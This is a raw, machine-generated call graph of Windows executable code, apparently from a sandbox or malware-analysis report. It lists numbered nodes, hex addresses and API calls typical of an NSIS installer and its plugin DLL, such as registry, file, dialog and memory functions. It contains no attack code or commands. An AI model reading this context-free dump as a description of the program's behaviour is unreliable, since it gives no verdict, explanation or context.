6ec01604 5244->5245 5246 6ec0161b VirtualFree 5244->5246 5245->5243 5246->5243 5249 6ec014c1 5247->5249 5248 6ec014c7 5248->5244 5249->5248 5250 6ec014d3 GlobalFree 5249->5250 5250->5244 4586 4041d3 4587 4041e9 4586->4587 4593 4042f5 4586->4593 4621 404068 4587->4621 4589 404364 4590 40442e 4589->4590 4592 40436e GetDlgItem 4589->4592 4630 4040cf 4590->4630 4598 404384 4592->4598 4599 4043ec 4592->4599 4593->4589 4593->4590 4595 404339 GetDlgItem SendMessageA 4593->4595 4594 40423f 4596 404068 18 API calls 4594->4596 4626 40408a KiUserCallbackDispatcher 4595->4626 4601 40424c CheckDlgButton 4596->4601 4598->4599 4603 4043aa SendMessageA LoadCursorA SetCursor 4598->4603 4599->4590 4604 4043fe 4599->4604 4624 40408a KiUserCallbackDispatcher 4601->4624 4602 404429 4618 404477 4603->4618 4605 404404 SendMessageA 4604->4605 4606 404415 4604->4606 4605->4606 4606->4602 4610 40441b SendMessageA 4606->4610 4607 40435f 4627 404453 4607->4627 4610->4602 4612 40426a GetDlgItem 4625 40409d SendMessageA 4612->4625 4615 404280 SendMessageA 4616 4042a7 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4615->4616 4617 40429e GetSysColor 4615->4617 4616->4602 4617->4616 4644 4056bc ShellExecuteExA 4618->4644 4620 4043dd LoadCursorA SetCursor 4620->4599 4622 405ffc 17 API calls 4621->4622 4623 404073 SetDlgItemTextA 4622->4623 4623->4594 4624->4612 4625->4615 4626->4607 4628 404461 4627->4628 4629 404466 SendMessageA 4627->4629 4628->4629 4629->4589 4631 404192 4630->4631 4632 4040e7 GetWindowLongA 4630->4632 4631->4602 4632->4631 4633 4040fc 4632->4633 4633->4631 4634 404129 GetSysColor 4633->4634 4635 40412c 4633->4635 4634->4635 4636 404132 SetTextColor 4635->4636 4637 40413c SetBkMode 4635->4637 4636->4637 4638 404154 GetSysColor 4637->4638 4639 40415a 4637->4639 4638->4639 4640 404161 SetBkColor 4639->4640 4641 40416b 4639->4641 4640->4641 4641->4631 4642 404185 CreateBrushIndirect 4641->4642 4643 40417e DeleteObject 4641->4643 4642->4631 4643->4642 4644->4620 5251 4014d6 5252 402b0a 17 API calls 5251->5252 5253 4014dc Sleep 5252->5253 5255 4029b8 5253->5255 5256 6ec01058 5258 6ec01074 5256->5258 5257 6ec010dc 5258->5257 5259 6ec014bb GlobalFree 5258->5259 5260 6ec01091 5258->5260 5259->5260 5261 6ec014bb GlobalFree 5260->5261 5262 6ec010a1 5261->5262 5263 6ec010b1 5262->5263 5264 6ec010a8 GlobalSize 5262->5264 5265 6ec010b5 GlobalAlloc 5263->5265 5266 6ec010c6 5263->5266 5264->5263 5267 6ec014e2 3 API calls 5265->5267 5268 6ec010d1 GlobalFree 5266->5268 5267->5266 5268->5257 5025 401759 5026 402b2c 17 API calls 5025->5026 5027 401760 5026->5027 5028 401786 5027->5028 5029 40177e 5027->5029 5066 405fda lstrcpynA 5028->5066 5065 405fda lstrcpynA 5029->5065 5032 401791 5034 405972 3 API calls 5032->5034 5033 401784 5036 406244 5 API calls 5033->5036 5035 401797 lstrcatA 5034->5035 5035->5033 5057 4017a3 5036->5057 5037 4062dd 2 API calls 5037->5057 5038 4017e4 5039 405b4e 2 API calls 5038->5039 5039->5057 5041 4017ba CompareFileTime 5041->5057 5042 40187e 5044 405101 24 API calls 5042->5044 5043 401855 5045 405101 24 API calls 5043->5045 5062 40186a 5043->5062 5047 401888 5044->5047 5045->5062 5046 405fda lstrcpynA 5046->5057 5048 402ffb 35 API calls 5047->5048 5049 40189b 5048->5049 5050 4018af SetFileTime 5049->5050 5052 4018c1 CloseHandle 5049->5052 5050->5052 5051 405ffc 17 API calls 5051->5057 5053 4018d2 5052->5053 5052->5062 5054 4018d7 5053->5054 5055 4018ea 5053->5055 5058 405ffc 17 API calls 5054->5058 5056 405ffc 17 API calls 5055->5056 5059 4018f2 5056->5059 5057->5037 5057->5038 5057->5041 5057->5042 5057->5043 5057->5046 5057->5051 5060 4056f6 MessageBoxIndirectA 5057->5060 5064 405b73 GetFileAttributesA CreateFileA 5057->5064 5061 4018df lstrcatA 5058->5061 5059->5062 5063 4056f6 MessageBoxIndirectA 5059->5063 5060->5057 5061->5059 5063->5062 5064->5057 5065->5033 5066->5032 5269 401659 5270 402b2c 17 API calls 5269->5270 5271 40165f 5270->5271 5272 4062dd 2 API calls 5271->5272 5273 401665 5272->5273 5274 401959 5275 402b0a 17 API calls 5274->5275 5276 401960 5275->5276 5277 402b0a 17 API calls 5276->5277 5278 40196d 5277->5278 5279 402b2c 17 API calls 5278->5279 5280 401984 lstrlenA 5279->5280 5282 401994 5280->5282 5281 4019d4 5282->5281 5286 405fda lstrcpynA 5282->5286 5284 4019c4 5284->5281 5285 4019c9 lstrlenA 5284->5285 5285->5281 5286->5284 5067 4024da 5068 402b6c 17 API calls 5067->5068 5069 4024e4 5068->5069 5070 402b2c 17 API calls 5069->5070 5071 4024ed 5070->5071 5072 4024f7 RegQueryValueExA 5071->5072 5077 402783 5071->5077 5073 40251d RegCloseKey 5072->5073 5074 402517 5072->5074 5073->5077 5074->5073 5078 405f38 wsprintfA 5074->5078 5078->5073 5294 401cda 5295 402b0a 17 API calls 5294->5295 5296 401ce0 IsWindow 5295->5296 5297 401a0e 5296->5297 5298 6ec0225a 5299 6ec022c4 5298->5299 5300 6ec022cf GlobalAlloc 5299->5300 5301 6ec022ee 5299->5301 5300->5299 5302 402cdd 5303 402d05 5302->5303 5304 402cec SetTimer 5302->5304 5305 402d5a 5303->5305 5306 402d1f MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5303->5306 5304->5303 5306->5305 5307 401a5e 5308 402b0a 17 API calls 5307->5308 5309 401a67 5308->5309 5310 402b0a 17 API calls 5309->5310 5311 401a0e 5310->5311 5312 6ec010e0 5313 6ec0110e 5312->5313 5314 6ec011c4 GlobalFree 5313->5314 5315 6ec012ad 2 API calls 5313->5315 5316 6ec011c3 5313->5316 5317 6ec01266 2 API calls 5313->5317 5318 6ec01155 GlobalAlloc 5313->5318 5319 6ec011ea GlobalFree 5313->5319 5320 6ec011b1 GlobalFree 5313->5320 5321 6ec012d1 lstrcpyA 5313->5321 5315->5313 5316->5314 5317->5320 5318->5313 5319->5313 5320->5313 5321->5313 4057 402363 4058 402371 4057->4058 4059 40236b 4057->4059 4060 402381 4058->4060 4062 402b2c 17 API calls 4058->4062 4061 402b2c 17 API calls 4059->4061 4063 402b2c 17 API calls 4060->4063 4065 40238f 4060->4065 4061->4058 4062->4060 4063->4065 4067 402b2c 4065->4067 4068 402b38 4067->4068 4073 405ffc 4068->4073 4071 402398 WritePrivateProfileStringA 4074 406009 4073->4074 4075 40622b 4074->4075 4078 406205 lstrlenA 4074->4078 4079 405ffc 10 API calls 4074->4079 4082 406121 GetSystemDirectoryA 4074->4082 4084 406134 GetWindowsDirectoryA 4074->4084 4085 406244 5 API calls 4074->4085 4086 405ffc 10 API calls 4074->4086 4087 4061ae lstrcatA 4074->4087 4088 406168 SHGetSpecialFolderLocation 4074->4088 4099 405ec1 4074->4099 4104 405f38 wsprintfA 4074->4104 4105 405fda lstrcpynA 4074->4105 4076 402b59 4075->4076 4106 405fda lstrcpynA 4075->4106 4076->4071 4090 406244 4076->4090 4078->4074 4079->4078 4082->4074 4084->4074 4085->4074 4086->4074 4087->4074 4088->4074 4089 406180 SHGetPathFromIDListA CoTaskMemFree 4088->4089 4089->4074 4097 406250 4090->4097 4091 4062bc CharPrevA 4094 4062b8 4091->4094 4092 4062ad CharNextA 4092->4094 4092->4097 4094->4091 4095 4062d7 4094->4095 4095->4071 4096 40629b CharNextA 4096->4097 4097->4092 4097->4094 4097->4096 4098 4062a8 CharNextA 4097->4098 4111 40599d 4097->4111 4098->4092 4107 405e60 4099->4107 4102 405f24 4102->4074 4103 405ef5 RegQueryValueExA RegCloseKey 4103->4102 4104->4074 4105->4074 4106->4076 4108 405e6f 4107->4108 4109 405e73 4108->4109 4110 405e78 RegOpenKeyExA 4108->4110 4109->4102 4109->4103 4110->4109 4112 4059a3 4111->4112 4113 4059b6 4112->4113 4114 4059a9 CharNextA 4112->4114 4113->4097 4114->4112 5322 401563 5323 402960 5322->5323 5326 405f38 wsprintfA 5323->5326 5325 402965 5326->5325 5327 401b63 5328 401bb4 5327->5328 5334 401b70 5327->5334 5329 401bdd GlobalAlloc 5328->5329 5331 401bb8 5328->5331 5332 405ffc 17 API calls 5329->5332 5330 40233b 5333 405ffc 17 API calls 5330->5333 5341 401bf8 5331->5341 5348 405fda lstrcpynA 5331->5348 5332->5341 5337 402348 5333->5337 5334->5330 5335 401b87 5334->5335 5346 405fda lstrcpynA 5335->5346 5337->5341 5342 4056f6 MessageBoxIndirectA 5337->5342 5339 401bca GlobalFree 5339->5341 5340 401b96 5347 405fda lstrcpynA 5340->5347 5342->5341 5344 401ba5 5349 405fda lstrcpynA 5344->5349 5346->5340 5347->5344 5348->5339 5349->5341 5350 6ec02be3 5351 6ec02bfb 5350->5351 5352 6ec01534 2 API calls 5351->5352 5353 6ec02c16 5352->5353 5354 402765 5355 402b2c 17 API calls 5354->5355 5356 40276c FindFirstFileA 5355->5356 5357 40278f 5356->5357 5360 40277f 5356->5360 5362 405f38 wsprintfA 5357->5362 5359 402796 5363 405fda lstrcpynA 5359->5363 5362->5359 5363->5360 5364 406666 5365 4064ea 5364->5365 5366 406e55 5365->5366 5367 406574 GlobalAlloc 5365->5367 5368 40656b GlobalFree 5365->5368 5369 4065e2 GlobalFree 5365->5369 5370 4065eb GlobalAlloc 5365->5370 5367->5365 5367->5366 5368->5367 5369->5370 5370->5365 5370->5366 5371 4063e7 WaitForSingleObject 5372 406401 5371->5372 5373 406413 GetExitCodeProcess 5372->5373 5374 4063ae 2 API calls 5372->5374 5375 406408 WaitForSingleObject 5374->5375 5375->5372 4132 4023e8 4133 40241a 4132->4133 4134 4023ef 4132->4134 4135 402b2c 17 API calls 4133->4135 4144 402b6c 4134->4144 4138 402421 4135->4138 4149 402bea 4138->4149 4139 402400 4141 402b2c 17 API calls 4139->4141 4143 402407 RegDeleteValueA RegCloseKey 4141->4143 4142 40242e 4143->4142 4145 402b2c 17 API calls 4144->4145 4146 402b83 4145->4146 4147 405e60 RegOpenKeyExA 4146->4147 4148 4023f6 4147->4148 4148->4139 4148->4142 4150 402bf6 4149->4150 4151 402bfd 4149->4151 4150->4142 4151->4150 4153 402c2e 4151->4153 4154 405e60 RegOpenKeyExA 4153->4154 4158 402c5c 4154->4158 4155 402c82 RegEnumKeyA 4156 402c99 RegCloseKey 4155->4156 4155->4158 4164 406372 GetModuleHandleA 4156->4164 4157 402cba RegCloseKey 4163 402cad 4157->4163 4158->4155 4158->4156 4158->4157 4160 402c2e 6 API calls 4158->4160 4158->4163 4160->4158 4162 402cca RegDeleteKeyA 4162->4163 4163->4150 4165 406398 GetProcAddress 4164->4165 4166 40638e 4164->4166 4168 402ca9 4165->4168 4170 406304 GetSystemDirectoryA 4166->4170 4168->4162 4168->4163 4169 406394 4169->4165 4169->4168 4172 406326 wsprintfA LoadLibraryExA 4170->4172 4172->4169 4173 40206a 4174 40207c 4173->4174 4184 40212a 4173->4184 4175 402b2c 17 API calls 4174->4175 4176 402083 4175->4176 4178 402b2c 17 API calls 4176->4178 4177 401423 24 API calls 4182 4022a9 4177->4182 4179 40208c 4178->4179 4180 4020a1 LoadLibraryExA 4179->4180 4181 402094 GetModuleHandleA 4179->4181 4183 4020b1 GetProcAddress 4180->4183 4180->4184 4181->4180 4181->4183 4185 4020c0 4183->4185 4186 4020fd 4183->4186 4184->4177 4188 4020c8 4185->4188 4189 4020df 4185->4189 4239 405101 4186->4239 4236 401423 4188->4236 4194 6ec016db 4189->4194 4190 4020d0 4190->4182 4192 40211e FreeLibrary 4190->4192 4192->4182 4195 6ec0170b 4194->4195 4250 6ec01a98 4195->4250 4197 6ec01712 4198 6ec01834 4197->4198 4199 6ec01723 4197->4199 4200 6ec0172a 4197->4200 4198->4190 4300 6ec022af 4199->4300 4284 6ec022f1 4200->4284 4205 6ec01770 4313 6ec024d8 4205->4313 4206 6ec0178e 4211 6ec01794 4206->4211 4212 6ec017dc 4206->4212 4207 6ec01740 4210 6ec01746 4207->4210 4215 6ec01751 4207->4215 4208 6ec01759 4221 6ec0174f 4208->4221 4310 6ec02cc3 4208->4310 4210->4221 4294 6ec02a38 4210->4294 4332 6ec0156b 4211->4332 4213 6ec024d8 11 API calls 4212->4213 4219 6ec017cd 4213->4219 4214 6ec01776 4324 6ec01559 4214->4324 4304 6ec026b2 4215->4304 4235 6ec01823 4219->4235 4338 6ec0249e 4219->4338 4221->4205 4221->4206 4225 6ec01757 4225->4221 4226 6ec024d8 11 API calls 4226->4219 4230 6ec0182d GlobalFree 4230->4198 4232 6ec0180f 4232->4235 4342 6ec014e2 wsprintfA 4232->4342 4233 6ec01808 FreeLibrary 4233->4232 4235->4198 4235->4230 4237 405101 24 API calls 4236->4237 4238 401431 4237->4238 4238->4190 4240 40511c 4239->4240 4249 4051bf 4239->4249 4241 405139 lstrlenA 4240->4241 4242 405ffc 17 API calls 4240->4242 4243 405162 4241->4243 4244 405147 lstrlenA 4241->4244 4242->4241 4246 405175 4243->4246 4247 405168 SetWindowTextA 4243->4247 4245 405159 lstrcatA 4244->4245 4244->4249 4245->4243 4248 40517b SendMessageA SendMessageA SendMessageA 4246->4248 4246->4249 4247->4246 4248->4249 4249->4190 4345 6ec01215 GlobalAlloc 4250->4345 4252 6ec01abf 4346 6ec01215 GlobalAlloc 4252->4346 4254 6ec01d00 GlobalFree GlobalFree GlobalFree 4255 6ec01d1d 4254->4255 4269 6ec01d67 4254->4269 4257 6ec020f1 4255->4257 4264 6ec01d32 4255->4264 4255->4269 4256 6ec01aca 4256->4254 4258 6ec01bbd GlobalAlloc 4256->4258 4260 6ec01c26 GlobalFree 4256->4260 4263 6ec01c08 lstrcpyA 4256->4263 4266 6ec01c12 lstrcpyA 4256->4266 4268 6ec01fb7 4256->4268 4256->4269 4276 6ec01ef9 GlobalFree 4256->4276 4277 6ec02033 4256->4277 4278 6ec01c64 4256->4278 4280 6ec01224 2 API calls 4256->4280 4259 6ec02113 GetModuleHandleA 4257->4259 4257->4269 4258->4256 4261 6ec02124 LoadLibraryA 4259->4261 4262 6ec02139 4259->4262 4260->4256 4261->4262 4261->4269 4353 6ec015c2 GetProcAddress 4262->4353 4263->4266 4264->4269 4349 6ec01224 4264->4349 4266->4256 4267 6ec0218a 4267->4269 4272 6ec02197 lstrlenA 4267->4272 4352 6ec01215 GlobalAlloc 4268->4352 4269->4197 4354 6ec015c2 GetProcAddress 4272->4354 4273 6ec0214b 4273->4267 4283 6ec02174 GetProcAddress 4273->4283 4274 6ec01fbf 4274->4197 4276->4256 4277->4269 4282 6ec0208c lstrcpyA 4277->4282 4278->4256 4347 6ec01534 GlobalSize GlobalAlloc 4278->4347 4279 6ec021b0 4279->4269 4280->4256 4282->4269 4283->4267 4285 6ec0230a 4284->4285 4287 6ec02446 GlobalFree 4285->4287 4288 6ec023b8 GlobalAlloc MultiByteToWideChar 4285->4288 4290 6ec01224 GlobalAlloc lstrcpynA 4285->4290 4292 6ec02405 4285->4292 4356 6ec012ad 4285->4356 4287->4285 4289 6ec01730 4287->4289 4291 6ec023e4 GlobalAlloc CLSIDFromString GlobalFree 4288->4291 4288->4292 4289->4207 4289->4208 4289->4221 4290->4285 4291->4287 4292->4287 4360 6ec02646 4292->4360 4297 6ec02a4a 4294->4297 4295 6ec02aef SetFilePointer 4296 6ec02b0d 4295->4296 4363 6ec029e4 4296->4363 4297->4295 4299 6ec02bd9 4299->4221 4301 6ec022c4 4300->4301 4302 6ec022cf GlobalAlloc 4301->4302 4303 6ec01729 4301->4303 4302->4301 4303->4200 4308 6ec026e2 4304->4308 4305 6ec02790 4307 6ec02796 GlobalSize 4305->4307 4309 6ec027a0 4305->4309 4306 6ec0277d GlobalAlloc 4306->4309 4307->4309 4308->4305 4308->4306 4309->4225 4311 6ec02cce 4310->4311 4312 6ec02d0e GlobalFree 4311->4312 4367 6ec01215 GlobalAlloc 4313->4367 4315 6ec02563 lstrcpynA 4319 6ec024e4 4315->4319 4316 6ec02574 StringFromGUID2 WideCharToMultiByte 4316->4319 4317 6ec02598 WideCharToMultiByte 4317->4319 4318 6ec025dd GlobalFree 4318->4319 4319->4315 4319->4316 4319->4317 4319->4318 4320 6ec025b9 wsprintfA 4319->4320 4321 6ec02617 GlobalFree 4319->4321 4322 6ec01266 2 API calls 4319->4322 4368 6ec012d1 4319->4368 4320->4319 4321->4214 4322->4319 4372 6ec01215 GlobalAlloc 4324->4372 4326 6ec0155e 4327 6ec0156b 2 API calls 4326->4327 4328 6ec01568 4327->4328 4329 6ec01266 4328->4329 4330 6ec012a8 GlobalFree 4329->4330 4331 6ec0126f GlobalAlloc lstrcpynA 4329->4331 4330->4219 4331->4330 4333 6ec015a4 lstrcpyA 4332->4333 4334 6ec01577 wsprintfA 4332->4334 4337 6ec015bd 4333->4337 4334->4337 4337->4226 4339 6ec017ef 4338->4339 4340 6ec024ac 4338->4340 4339->4232 4339->4233 4340->4339 4341 6ec024c5 GlobalFree 4340->4341 4341->4340 4343 6ec01266 2 API calls 4342->4343 4344 6ec01503 4343->4344 4344->4235 4345->4252 4346->4256 4348 6ec01552 4347->4348 4348->4278 4355 6ec01215 GlobalAlloc 4349->4355 4351 6ec01233 lstrcpynA 4351->4269 4352->4274 4353->4273 4354->4279 4355->4351 4357 6ec012b4 4356->4357 4358 6ec01224 2 API calls 4357->4358 4359 6ec012cf 4358->4359 4359->4285 4361 6ec02654 VirtualAlloc 4360->4361 4362 6ec026aa 4360->4362 4361->4362 4362->4292 4364 6ec029ef 4363->4364 4365 6ec029f4 GetLastError 4364->4365 4366 6ec029ff 4364->4366 4365->4366 4366->4299 4367->4319 4369 6ec012f9 4368->4369 4370 6ec012da 4368->4370 4369->4319 4370->4369 4371 6ec012e0 lstrcpyA 4370->4371 4371->4369 4372->4326 5376 40166a 5377 402b2c 17 API calls 5376->5377 5378 401671 5377->5378 5379 402b2c 17 API calls 5378->5379 5380 40167a 5379->5380 5381 402b2c 17 API calls 5380->5381 5382 401683 MoveFileA 5381->5382 5383 401696 5382->5383 5389 40168f 5382->5389 5384 4062dd 2 API calls 5383->5384 5386 4022a9 5383->5386 5387 4016a5 5384->5387 5385 401423 24 API calls 5385->5386 5387->5386 5388 405db9 36 API calls 5387->5388 5388->5389 5389->5385 5390 4025ea 5391 402603 5390->5391 5392 4025ef 5390->5392 5394 402b2c 17 API calls 5391->5394 5393 402b0a 17 API calls 5392->5393 5396 4025f8 5393->5396 5395 40260a lstrlenA 5394->5395 5395->5396 5397 405c1a WriteFile 5396->5397 5398 40262c 5396->5398 5397->5398 5399 404a6d GetDlgItem GetDlgItem 5400 404ac3 7 API calls 5399->5400 5404 404cea 5399->5404 5401 404b6b DeleteObject 5400->5401 5402 404b5f SendMessageA 5400->5402 5403 404b76 5401->5403 5402->5401 5405 404bad 5403->5405 5406 405ffc 17 API calls 5403->5406 5421 404dcc 5404->5421 5431 404d59 5404->5431 5452 4049bb SendMessageA 5404->5452 5407 404068 18 API calls 5405->5407 5411 404b8f SendMessageA SendMessageA 5406->5411 5412 404bc1 5407->5412 5408 404e78 5409 404e82 SendMessageA 5408->5409 5410 404e8a 5408->5410 5409->5410 5422 404ea3 5410->5422 5423 404e9c ImageList_Destroy 5410->5423 5428 404eb3 5410->5428 5411->5403 5417 404068 18 API calls 5412->5417 5413 404cdd 5414 4040cf 8 API calls 5413->5414 5420 40506e 5414->5420 5415 404dbe SendMessageA 5415->5421 5432 404bd2 5417->5432 5418 404e25 SendMessageA 5418->5413 5419 404e3a SendMessageA 5418->5419 5425 404e4d 5419->5425 5421->5408 5421->5413 5421->5418 5426 404eac GlobalFree 5422->5426 5422->5428 5423->5422 5424 405022 5424->5413 5429 405034 ShowWindow GetDlgItem ShowWindow 5424->5429 5436 404e5e SendMessageA 5425->5436 5426->5428 5427 404cac GetWindowLongA SetWindowLongA 5430 404cc5 5427->5430 5428->5424 5446 404eee 5428->5446 5457 404a3b 5428->5457 5429->5413 5433 404ce2 5430->5433 5434 404cca ShowWindow 5430->5434 5431->5415 5431->5421 5432->5427 5435 404c24 SendMessageA 5432->5435 5437 404ca7 5432->5437 5440 404c62 SendMessageA 5432->5440 5441 404c76 SendMessageA 5432->5441 5451 40409d SendMessageA 5433->5451 5450 40409d SendMessageA 5434->5450 5435->5432 5436->5408 5437->5427 5437->5430 5440->5432 5441->5432 5443 404ff8 InvalidateRect 5443->5424 5444 40500e 5443->5444 5466 404976 5444->5466 5445 404f1c SendMessageA 5449 404f32 5445->5449 5446->5445 5446->5449 5448 404fa6 SendMessageA SendMessageA 5448->5449 5449->5443 5449->5448 5450->5413 5451->5404 5453 404a1a SendMessageA 5452->5453 5454 4049de GetMessagePos ScreenToClient SendMessageA 5452->5454 5455 404a12 5453->5455 5454->5455 5456 404a17 5454->5456 5455->5431 5456->5453 5469 405fda lstrcpynA 5457->5469 5459 404a4e 5470 405f38 wsprintfA 5459->5470 5461 404a58 5462 40140b 2 API calls 5461->5462 5463 404a61 5462->5463 5471 405fda lstrcpynA 5463->5471 5465 404a68 5465->5446 5472 4048b1 5466->5472 5468 40498b 5468->5424 5469->5459 5470->5461 5471->5465 5473 4048c7 5472->5473 5474 405ffc 17 API calls 5473->5474 5475 40492b 5474->5475 5476 405ffc 17 API calls 5475->5476 5477 404936 5476->5477 5478 405ffc 17 API calls 5477->5478 5479 40494c lstrlenA wsprintfA SetDlgItemTextA 5478->5479 5479->5468 5480 4019ed 5481 402b2c 17 API calls 5480->5481 5482 4019f4 5481->5482 5483 402b2c 17 API calls 5482->5483 5484 4019fd 5483->5484 5485 401a04 lstrcmpiA 5484->5485 5486 401a16 lstrcmpA 5484->5486 5487 401a0a 5485->5487 5486->5487 4412 4026ef 4413 4026f6 4412->4413 4416 402965 4412->4416 4414 402b0a 17 API calls 4413->4414 4415 4026fd 4414->4415 4417 40270c SetFilePointer 4415->4417 4417->4416 4418 40271c 4417->4418 4420 405f38 wsprintfA 4418->4420 4420->4416 5488 40156f 5489 401586 5488->5489 5490 40157f ShowWindow 5488->5490 5491 401594 ShowWindow 5489->5491 5492 4029b8 5489->5492 5490->5489 5491->5492 5500 4014f4 SetForegroundWindow 5501 4029b8 5500->5501 5502 405075 5503 405085 5502->5503 5504 405099 5502->5504 5505 40508b 5503->5505 5514 4050e2 5503->5514 5506 4050a1 IsWindowVisible 5504->5506 5509 4050b8 5504->5509 5507 4040b4 SendMessageA 5505->5507 5508 4050ae 5506->5508 5506->5514 5511 405095 5507->5511 5512 4049bb 5 API calls 5508->5512 5510 4050e7 CallWindowProcA 5509->5510 5513 404a3b 4 API calls 5509->5513 5510->5511 5512->5509 5513->5514 5514->5510 5515 4044fa 5516 404526 5515->5516 5517 404537 5515->5517 5576 4056da GetDlgItemTextA 5516->5576 5519 404543 GetDlgItem 5517->5519 5525 4045a2 5517->5525 5522 404557 5519->5522 5520 404686 5524 404830 5520->5524 5578 4056da GetDlgItemTextA 5520->5578 5521 404531 5523 406244 5 API calls 5521->5523 5527 40456b SetWindowTextA 5522->5527 5528 405a0b 4 API calls 5522->5528 5523->5517 5532 4040cf 8 API calls 5524->5532 5525->5520 5525->5524 5529 405ffc 17 API calls 5525->5529 5531 404068 18 API calls 5527->5531 5533 404561 5528->5533 5534 404616 SHBrowseForFolderA 5529->5534 5530 4046b6 5535 405a60 18 API calls 5530->5535 5536 404587 5531->5536 5537 404844 5532->5537 5533->5527 5541 405972 3 API calls 5533->5541 5534->5520 5538 40462e CoTaskMemFree 5534->5538 5539 4046bc 5535->5539 5540 404068 18 API calls 5536->5540 5542 405972 3 API calls 5538->5542 5579 405fda lstrcpynA 5539->5579 5543 404595 5540->5543 5541->5527 5544 40463b 5542->5544 5577 40409d SendMessageA 5543->5577 5547 404672 SetDlgItemTextA 5544->5547 5552 405ffc 17 API calls 5544->5552 5547->5520 5548 40459b 5550 406372 5 API calls 5548->5550 5549 4046d3 5551 406372 5 API calls 5549->5551 5550->5525 5558 4046da 5551->5558 5553 40465a lstrcmpiA 5552->5553 5553->5547 5556 40466b lstrcatA 5553->5556 5554 404716 5580 405fda lstrcpynA 5554->5580 5556->5547 5557 40471d 5559 405a0b 4 API calls 5557->5559 5558->5554 5562 4059b9 2 API calls 5558->5562 5564 40476e 5558->5564 5560 404723 GetDiskFreeSpaceA 5559->5560 5563 404747 MulDiv 5560->5563 5560->5564 5562->5558 5563->5564 5565 4047df 5564->5565 5567 404976 20 API calls 5564->5567 5566 404802 5565->5566 5568 40140b 2 API calls 5565->5568 5581 40408a KiUserCallbackDispatcher 5566->5581 5569 4047cc 5567->5569 5568->5566 5571 4047e1 SetDlgItemTextA 5569->5571 5572 4047d1 5569->5572 5571->5565 5574 4048b1 20 API calls 5572->5574 5573 40481e 5573->5524 5575 404453 SendMessageA 5573->5575 5574->5565 5575->5524 5576->5521 5577->5548 5578->5530 5579->5549 5580->5557 5581->5573 5582 401cfb 5583 402b0a 17 API calls 5582->5583 5584 401d02 5583->5584 5585 402b0a 17 API calls 5584->5585 5586 401d0e GetDlgItem 5585->5586 5587 4025e4 5586->5587 5588 4018fd 5589 401934 5588->5589 5590 402b2c 17 API calls 5589->5590 5591 401939 5590->5591 5592 4057a2 67 API calls 5591->5592 5593 401942 5592->5593 5594 401dff GetDC 5595 402b0a 17 API calls 5594->5595 5596 401e11 GetDeviceCaps MulDiv ReleaseDC 5595->5596 5597 402b0a 17 API calls 5596->5597 5598 401e42 5597->5598 5599 405ffc 17 API calls 5598->5599 5600 401e7f CreateFontIndirectA 5599->5600 5601 4025e4 5600->5601 5602 401000 5603 401037 BeginPaint GetClientRect 5602->5603 5604 40100c DefWindowProcA 5602->5604 5606 4010f3 5603->5606 5607 401179 5604->5607 5608 401073 CreateBrushIndirect FillRect DeleteObject 5606->5608 5609 4010fc 5606->5609 5608->5606 5610 401102 CreateFontIndirectA 5609->5610 5611 401167 EndPaint 5609->5611 5610->5611 5612 401112 6 API calls 5610->5612 5611->5607 5612->5611 5613 401900 5614 402b2c 17 API calls 5613->5614 5615 401907 5614->5615 5616 4056f6 MessageBoxIndirectA 5615->5616 5617 401910 5616->5617 5618 6ec01000 5621 6ec0101b 5618->5621 5622 6ec014bb GlobalFree 5621->5622 5623 6ec01020 5622->5623 5624 6ec01024 5623->5624 5625 6ec01027 GlobalAlloc 5623->5625 5626 6ec014e2 3 API calls 5624->5626 5625->5624 5627 6ec01019 5626->5627 5628 401502 5629 40150a 5628->5629 5631 40151d 5628->5631 5630 402b0a 17 API calls 5629->5630 5630->5631 4373 401c0a 4395 402b0a 4373->4395 4375 401c11 4376 402b0a 17 API calls 4375->4376 4377 401c1e 4376->4377 4378 402b2c 17 API calls 4377->4378 4379 401c33 4377->4379 4378->4379 4380 402b2c 17 API calls 4379->4380 4384 401c43 4379->4384 4380->4384 4381 401c9a 4383 402b2c 17 API calls 4381->4383 4382 401c4e 4385 402b0a 17 API calls 4382->4385 4386 401c9f 4383->4386 4384->4381 4384->4382 4387 401c53 4385->4387 4388 402b2c 17 API calls 4386->4388 4389 402b0a 17 API calls 4387->4389 4390 401ca8 FindWindowExA 4388->4390 4391 401c5f 4389->4391 4394 401cc6 4390->4394 4392 401c8a SendMessageA 4391->4392 4393 401c6c SendMessageTimeoutA 4391->4393 4392->4394 4393->4394 4396 405ffc 17 API calls 4395->4396 4397 402b1f 4396->4397 4397->4375 4421 401e8f 4422 402b0a 17 API calls 4421->4422 4423 401e95 4422->4423 4424 402b0a 17 API calls 4423->4424 4425 401ea1 4424->4425 4426 401eb8 EnableWindow 4425->4426 4427 401ead ShowWindow 4425->4427 4428 4029b8 4426->4428 4427->4428 5639 401490 5640 405101 24 API calls 5639->5640 5641 401497 5640->5641 5642 402993 SendMessageA 5643 4029ad InvalidateRect 5642->5643 5644 4029b8 5642->5644 5643->5644 4645 403b94 4646 403ce7 4645->4646 4647 403bac 4645->4647 4649 403d38 4646->4649 4650 403cf8 GetDlgItem GetDlgItem 4646->4650 4647->4646 4648 403bb8 4647->4648 4652 403bc3 SetWindowPos 4648->4652 4653 403bd6 4648->4653 4651 403d92 4649->4651 4659 401389 2 API calls 4649->4659 4654 404068 18 API calls 4650->4654 4674 403ce2 4651->4674 4716 4040b4 4651->4716 4652->4653 4656 403bf3 4653->4656 4657 403bdb ShowWindow 4653->4657 4658 403d22 SetClassLongA 4654->4658 4660 403c15 4656->4660 4661 403bfb DestroyWindow 4656->4661 4657->4656 4662 40140b 2 API calls 4658->4662 4665 403d6a 4659->4665 4663 403c1a SetWindowLongA 4660->4663 4664 403c2b 4660->4664 4715 403ff1 4661->4715 4662->4649 4663->4674 4666 403cd4 4664->4666 4667 403c37 GetDlgItem 4664->4667 4665->4651 4668 403d6e SendMessageA 4665->4668 4672 4040cf 8 API calls 4666->4672 4671 403c4a SendMessageA IsWindowEnabled 4667->4671 4677 403c67 4667->4677 4668->4674 4669 40140b 2 API calls 4706 403da4 4669->4706 4670 403ff3 DestroyWindow EndDialog 4670->4715 4671->4674 4671->4677 4672->4674 4673 404022 ShowWindow 4673->4674 4675 405ffc 17 API calls 4675->4706 4676 403c6c 4732 404041 4676->4732 4677->4676 4678 403c74 4677->4678 4681 403cbb SendMessageA 4677->4681 4682 403c87 4677->4682 4678->4676 4678->4681 4680 404068 18 API calls 4680->4706 4681->4666 4684 403ca4 4682->4684 4685 403c8f 4682->4685 4683 403ca2 4683->4666 4686 40140b 2 API calls 4684->4686 4729 40140b 4685->4729 4688 403cab 4686->4688 